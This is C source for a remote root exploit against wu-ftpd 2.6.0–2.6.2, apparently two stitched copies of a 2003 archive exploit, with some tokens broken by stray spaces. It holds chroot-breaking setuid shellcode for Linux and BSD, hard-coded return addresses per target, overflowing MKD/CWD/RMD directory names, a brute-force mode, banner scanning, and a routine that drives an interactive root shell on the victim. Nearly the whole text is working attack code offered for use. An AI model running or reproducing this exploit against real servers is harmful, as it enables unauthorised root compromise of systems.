dir_nm[cmd_f++]=(0x20);
for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(shellcode_ffx2);dr_n++)
{
dir_nm[dr_n]=(DEF_NOP);
}
for(cmd_f=(NRL);cmd_f<strlen(shellcode_ffx2);cmd_f++)
{
dir_nm[dr_n++]=shellcode_ffx2[cmd_f];
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);
if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,(GET_R)-1,(NRL));
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
exit(FAD);
}
return;
}
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
char atk_bf[(GET_R)];
{
fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41)); /* 01 */
fprintf(stdout," [+] 02: make shell-code directory.\n");
(int)send_shellcode(sock,d_type,(atk_bf)); /* 02 */
fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43)); /* 03 */
fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44)); /* 04 */
fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45)); /* 05 */
fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46)); /* 06 */
fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47)); /* 07 */
fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48)); /* 08 */
fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49)); /* 09 */
fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50)); /* 10 */
fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51)); /* 11 */
fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52)); /* 12 */
fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53)); /* 13 */
fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54)); /* 14 */
fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55)); /* 15 */
(int)make_retloc(sock,type,(atk_bf),sh_addr); /* 16 */
}
return;
}
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)atk_bf,(NRL),(GET_R));
if(type) /* MKD command */
{
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x4b);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
else /* RMD command */
{
atk_bf[cmd_f++]=(0x52);
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(DEF_ANSH);r_rn_2++)
atk_bf[r_rn_1++]=(0x41);
{
*(long *)&atk_bf[r_rn_1]=(sh_addr);
r_rn_1+=(DEF_ALIGN);
*(long *)&atk_bf[r_rn_1]=(sh_addr);
r_rn_1+=(DEF_ALIGN);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x0d);
atk_bf[r_rn_1++]=(0x0a);
}
send(sock,atk_bf,strlen(atk_bf),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(type) /* MKD command */
{
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
}
else /* RMD command */
{
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
}
return;
}
int main(int argc,char *argv[])
{
int opt_g,sock,__bf=(NRL);
int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
char user_id[(DEF_VA)]=(DEF_STR);
char pass_wd[(DEF_VA)]=(DEF_STR);
char tg_host[(DEF_VA)]=(DEF_HOST);
int tg_port=(DEF_PORT);
u_long sh_addr=(plat[t_g].sh_addr);
(void)banrl();
while((opt_g=getopt(argc,argv,"M:m:H:h:U:u:P:p:N:n:S:s:T:t:BbIi"))!=EOF)
{
extern char *optarg;
switch(opt_g)
{
case 'M':
case 'm':
mx_bf=(atoi(optarg));
bf_lsz=((0x1000)/mx_bf);
break;
case 'H':
case 'h':
memset((char *)tg_host,(NRL),sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;
case 'U':
case 'u':
memset((char *)user_id,(NRL),sizeof(user_id));
strncpy(user_id,optarg,sizeof(user_id)-1);
break;
case 'P':
case 'p':
memset((char *)pass_wd,(NRL),sizeof(pass_wd));
strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
break;
case 'N':
case 'n':
tg_port=(atoi(optarg));
break;
case 'S':
case 's':
sh_addr=strtoul(optarg,(NRL),(NRL));
break;
case 'T':
case 't':
if((t_g=(atoi(optarg)))<(3))
sh_addr=(plat[t_g].sh_addr);
else (void)prcode_usage(argv[(NRL)]);
break;
case 'B':
case 'b':
__bf=(SCS);
break;
case 'I':
case 'i':
(void)prcode_usage(argv[(NRL)]);
break;
case '?':
(void)prcode_usage(argv[(NRL)]);
break;
}
}
if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DE F_STR)))
(void)prcode_usage(argv[(NRL)]);
memset((char *)home_dir,(NRL),sizeof(home_dir));
snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(HOME_DIR),user_id);
if(!__bf)
{
fprintf(stdout," Target: %s.\n",(plat[t_g].v_nm));
fprintf(stdout," [+] address: %p.\n",sh_addr);
fprintf(stdout," #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [2] send exploit code.\n");
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
close(sock);
fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".\n");
(void)conn_shell(sock);
close(sock);
}
else
{
int bt_num=(NRL);
t_g=(4);
sh_addr=(plat[t_g].sh_addr);
fprintf(stdout," Brute-Force mode.\n");
fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);
for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
{
sh_addr=(u_long)null_chk(sh_addr);
fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
fprintf(stdout," #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [2] send exploit code.\n");
if(bt_num==(NRL))
{
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
}
else
{
(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
}
close(sock);
fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".\n");
(void)conn_shell(sock);
close(sock);
sh_addr+=(bf_lsz);
}
}
exit(NRL);
}
int setsock(char *u_host,int u_port)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;
if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
{
return(FAD);
}
if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD) )
{
return(FAD);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(u_port);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
{
return(FAD);
}
return(sock);
}
void conn_shell(int conn_sock)
{
int died;
int ex_t=(NRL);
char *command=(DEF_COMM);
char readbuf[(GET_R)];
fd_set rset;
memset((char *)readbuf,(NRL),sizeof(readbuf));
fprintf(stdout," Send, command packet !\n\n");
send(conn_sock,command,strlen(command),(NRL));
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(conn_sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(conn_sock+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(conn_sock,&rset))
{
died=read(conn_sock,readbuf,sizeof(readbuf)-1);
if(died<=(NRL))
{
if(!ex_t)
return;
else
exit(NRL);
}
readbuf[died]=(NRL);
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>(NRL))
{
readbuf[died]=(NRL);
if(strstr(readbuf,"exit"))
ex_t=(SCS);
write(conn_sock,readbuf,died);
}
}
}
return;
}
void re_connt(int st_sock_va)
{
if(st_sock_va==(FAD))
{
fprintf(stdout," [ Fail ]\n\n");
exit(FAD);
}
}
void banrl()
{
fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}
/* eoc */
# [2003-08-03]
21 wu-ftpd 2.6.2 Remote Root Exploit (advanced version)
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
**
** Update:
** [v0.0.2] August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** [v0.0.3] August 3, Brute-Force function addition.
** [v0.0.4] August 4, Added FreeBSD, OpenBSD version wu-ftpd-2.6.x exploit.
** It will be applied well to most XxxxBSD.
** [v0.0.5] August 4, Remote scan & exploit test function addition.
** August 6, Cleaning.
**
*/
#define VERSION "v0.0.5"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD 55
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR_LINUX "/home/"
#define HOME_DIR_FRBSD "/usr/home/"
#define HOME_DIR_OPBSD "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
#define DEF_COMM_OB "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec sh -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
#define CMD_ERROR "500"
void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock,u_long scs_addr);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();
int bscann(char *chk_ban);
int check_exp(int sock);
struct os
{
int num;
char *v_nm;
u_long sh_addr;
u_long bf_addr;
char *shellcode;
int off_st;
char *home;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
int __exp_test=(NRL); /* check exploit test */
int b_scan=(NRL); /* banner check */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char lnx_shellcode_ffx2[]=
/* setuid/chroot-break/execve shellcode by Lam3rZ */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x 31\xdb\x43\x89"
"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\x c9\x8d\x5e\x01"
"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x 31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x 43\x02\x31\xc9"
"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\x c9\x75\xf3\x31"
"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x 0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x 89\x46\x0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\x c0\x31\xdb\xb0"
"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x 62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";
char bsd_shellcode_ffx2[]=
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\x c0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x 31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x 53\xb0\x88"
"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x 80\x31"
"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\x c9\x31"
"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x 75\xf1"
"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\x cd\x80"
"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x 46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x 56\x0c"
"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x 53\x53"
"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x 30\x62\x69\x6e\x30"
"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x 69\x6e"
"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x 65\x2e"
"\x63\x6f\x6d";
struct os plat[]=
{
/*
** I enjoy version up, will not share more. :-}
*/
{
0,"RedHat Linux 6.x Version wu-2.6.0 compile",0x0806a59c,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HO ME_DIR_LINUX)
},
{
1,"RedHat Linux 6.x Version wu-2.6.1 compile",0x0806aad8,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HO ME_DIR_LINUX)
},
{
2,"RedHat Linux 6.x Version wu-2.6.2 compile",0x0806aa60,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HO ME_DIR_LINUX)
},
{
3,"FreeBSD 4.6.2-RELEASE Version wu-2.6.0 compile",0x0806b826,
0x0806b026,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_FRBSD)
},
{
4,"FreeBSD 4.6.2-RELEASE Version wu-2.6.1 compile",0x0806cb36,
0x0806c036,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_FRBSD)
},
{
5,"FreeBSD 4.6.2-RELEASE Version wu-2.6.2 compile",0x0806ccaa,
0x0806c082,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_FRBSD)
},
{
6,"OpenBSD 3.0 Version wu-2.6.0 compile",0xdfbfc8f8,
0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_OPBSD)
},
{
7,"OpenBSD 3.0 Version wu-2.6.1 compile",0xdfbfc8f8,
0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_OPBSD)
},
{
8,"OpenBSD 3.0 Version wu-2.6.2 compile",0xdfbfc8f8,
0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_OPBSD)
},
{
0x82,NULL,0x0,0x0,NULL,0,NULL
}
};
void prcode_usage(char *f_nm)
{
int r_n=(NRL);
fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
fprintf(stdout," \t-h [hostname] : Target hostname & ip.\n");
fprintf(stdout," \t-u [userid] : User id.\n");
fprintf(stdout," \t-p [passwd] : User password.\n");
fprintf(stdout," \t-n [port num] : Target port number.\n");
fprintf(stdout," \t-s [shelladdr] : Shellcode address.\n");
fprintf(stdout," \t-m [max num] : Brute-Force Count number.\n");
fprintf(stdout," \t-i : help information.\n");
fprintf(stdout," \t-q : banner scan mode.\n");
fprintf(stdout," \t-c : check exploit test.\n");
fprintf(stdout," \t-t [target num] : Select target number.\n");
fprintf(stdout," \t-b [target num] : Brute-Force mode. (Select target number)\n\n");
for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
{
fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
}
fprintf(stdout,"\n Example1: %s -hlocalhost -ux82 -px82 -n21 -t0",f_nm);
fprintf(stdout,"\n Example2: %s -hwu_sub -ux82 -px82 -n21 -b0",f_nm);
fprintf(stdout,"\n Example3: %s -h0 -ux82 -px82 -qc -t0\n\n",f_nm);
exit(FAD);
}
u_long null_chk(u_long sh_addr)
{
int chk_0x2f=(NRL);
for(chk_0x2f=(NRL);chk_0x2f<0x20;chk_0x2f+=(DEF_ALIGN*2))
{
if((sh_addr>>(chk_0x2f)&0xff)==(0x2f))
{
fprintf(stderr," [-] slash was included to &shellcode address.\n\n");
exit(FAD);
}
}
if((sh_addr>>(NRL)&0xff)==(0x00))
{
return(sh_addr+=(SCS));
}
else return(sh_addr);
}
int bscann(char *chk_ban)
{
fprintf(stdout,"\n [+] Checking, banner ...\n");
if(strstr(chk_ban,"wu-2.6.0"))
{
fprintf(stdout," [wu-ftpd-2.6.0]: This is version that exploit is possible.\n\n");
return(SCS);
}
else if(strstr(chk_ban,"wu-2.6.1"))
{
fprintf(stdout," [wu-ftpd-2.6.1]: This is version that exploit is possible.\n\n");
return(SCS);
}
else if(strstr(chk_ban,"wu-2.6.2"))
{
fprintf(stdout," [wu-ftpd-2.6.2]: This is version that exploit is possible.\n\n");
return(SCS);
}
else
{
fprintf(stdout," [x] This version does not support exploit.\n");
return(FAD);
}
}
void ftpd_login(int sock,char *user,char *pass)
{
char send_recv[(GET_R)];
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(b_scan)
{
b_scan=(NRL);
if(((int)bscann(send_recv))==(FAD))
{
fprintf(stdout," [-] exploit stop.\n\n");
exit(FAD);
}
}
if(!strstr(send_recv,(FTP_CONN_SCS)))
{
fprintf(stdout," [-] ftpd connection failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," ftpd connection success.\n");
fprintf(stdout," [+] User id input.\n");
memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
send(sock,send_recv,strlen(send_recv),(NRL));
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(!strstr(send_recv,(FTP_USER_FAD)))
{
fprintf(stdout," [-] User id input failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," [+] User password input.\n");
memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
send(sock,send_recv,strlen(send_recv),(NRL));
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(strstr(send_recv,(FTP_LOGIN_FAD)))
{
fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
close(sock);
exit(FAD);
}
else if(strstr(send_recv,(FTP_LOGIN_SCS)))
{
fprintf(stdout," User %s logged in.\n",user);
}
else
{
fprintf(stdout," [-] ftpd handshake failure.\n\n");
close(sock);
exit(FAD);
}
return;
}
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);
for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
{
dir_nm[dr_n]=(gb_character);
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);
if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD command failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD command failed.\n\n");
exit(FAD);
}
return;
}
int send_shellcode(int sock,int type,char *dir_nm)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);
for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(plat[t_g].shellcode);dr_n++)
{
dir_nm[dr_n]=(DEF_NOP);
}
for(cmd_f=(NRL);cmd_f<strlen(plat[t_g].shellcode);cmd_f++)
{
dir_nm[dr_n++]=plat[t_g].shellcode[cmd_f];
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);
if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,(GET_R)-1,(NRL));
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
exit(FAD);
}
return;
}
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
char atk_bf[(GET_R)];
switch(t_g)
{
case 0:
case 1:
case 2:
fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41)); /* 01 */
fprintf(stdout," [+] 02: make shell-code directory.\n");
(int)send_shellcode(sock,d_type,(atk_bf)); /* 02 */
fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43)); /* 03 */
fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44)); /* 04 */
fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45)); /* 05 */
fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46)); /* 06 */
fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47)); /* 07 */
fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48)); /* 08 */
fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49)); /* 09 */
fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50)); /* 10 */
fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51)); /* 11 */
fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52)); /* 12 */
fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53)); /* 13 */
fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54)); /* 14 */
fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55)); /* 15 */
(int)make_retloc(sock,type,(atk_bf),sh_addr); /* 16 */
break;
case 3:
case 4:
case 5:
case 6:
case 7:
case 8:
fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41)); /* 01 */
fprintf(stdout," [+] 02: make shell-code directory.\n");
(int)send_shellcode(sock,d_type,(atk_bf)); /* 02 */
fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43)); /* 03 */
(int)make_retloc(sock,type,(atk_bf),sh_addr); /* 04 */
break;
}
if(type&&__exp_test)
{
__exp_test=(NRL);
if(((int)check_exp(sock))==(FAD))
{
fprintf(stderr," [-] This isn't vulnerable.\n\n");
exit(FAD);
}
}
return;
}
